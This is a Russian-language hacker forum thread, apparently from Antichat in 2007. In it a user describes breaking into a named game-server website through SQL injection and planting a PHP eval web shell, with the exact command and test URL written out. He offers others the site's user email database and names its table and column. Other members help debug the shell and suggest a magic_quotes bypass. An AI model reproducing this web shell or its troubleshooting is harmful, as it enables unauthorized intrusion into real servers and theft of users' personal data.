ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Сломал сайт, залил Php файл, а ничё не работает!
  #1  
Старый 09.01.2007, 02:21
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию Сломал сайт, залил Php файл, а ничё не работает!

Хай! Вот нащёл сайт!
_http://jeux-mu-sacre-online.no-ip.org/
Нащёл в нём SQL Injection, выполнил команду
echo "<? eval(stripslashes($_GET[c])); ?>" > D:/wamp/www/info.php
Файл создался, но...
http://jeux-mu-sacre-online.no-ip.org/info.php?c=echo '123';
И ничего... В общем если кому удасться разобраться в чём проблема, раскажите А БД можете себе брать, тама MSSQL в
БД: MuOnline
Таблица: MEMB_INFO
Колонка: mail_addr
Хранятся мыльники юзверей (я так понимаю их тама только 389 )
В общем очень интересно где скривили мои руки, почему сервер не слушает меня
 
Ответить с цитированием

  #2  
Старый 09.01.2007, 02:43
sunb0rn
Новичок
Регистрация: 05.09.2006
Сообщений: 18
Провел на форуме:
706223

Репутация: 42
Отправить сообщение для sunb0rn с помощью ICQ
По умолчанию

А ты посмотри в сорсаx что делается - "<? eval(stripslashes($_GET[c])); ?>" так в кавычкаx и осталось!!!
 
Ответить с цитированием

  #3  
Старый 09.01.2007, 02:46
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

ссылку на саму sql Injection!В студию.
 
Ответить с цитированием

  #4  
Старый 09.01.2007, 03:02
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

sunb0rn, а без ковычек никак, ктомуже они на PHP никак не действуют! Как я буду использовать echo text > file если там символ > и в <? , ?> тоже эти символы...
Я так много раз делал, всё работало, а вот тут нехочет...

Последний раз редактировалось Ponchik; 09.01.2007 в 03:07..
 
Ответить с цитированием

  #5  
Старый 09.01.2007, 03:20
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

sunb0rn, php код между тегами <? ?> в данном случае. все что до него и после - не важно.
Ponchik, посмотри код страницы) пхп не обрабатывается.
 
Ответить с цитированием

  #6  
Старый 09.01.2007, 03:47
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Почему не обрабатывается... Еслиб не обрабатывался, нобы и выводил весь код страницы, а так всё фурычит... Странно... Мистикааааа! В общем можно забить на этот сайт...
 
Ответить с цитированием

  #7  
Старый 09.01.2007, 03:51
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

Цитата:
а так всё фурычит...

не спорь ((=
 
Ответить с цитированием

  #8  
Старый 09.01.2007, 04:04
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Позволь поспорить
http://img177.imageshack.us/img177/3940/screenshot0pg1.jpg
 
Ответить с цитированием

  #9  
Старый 09.01.2007, 04:06
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

я про сайт :d
 
Ответить с цитированием

  #10  
Старый 09.01.2007, 04:16
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

если magic_quotes=on то нихуя работать не будет. Можно обойти например echo(chr(0x56))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
PHP Including FAQ kot777 Уязвимости 1 02.05.2006 22:05
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ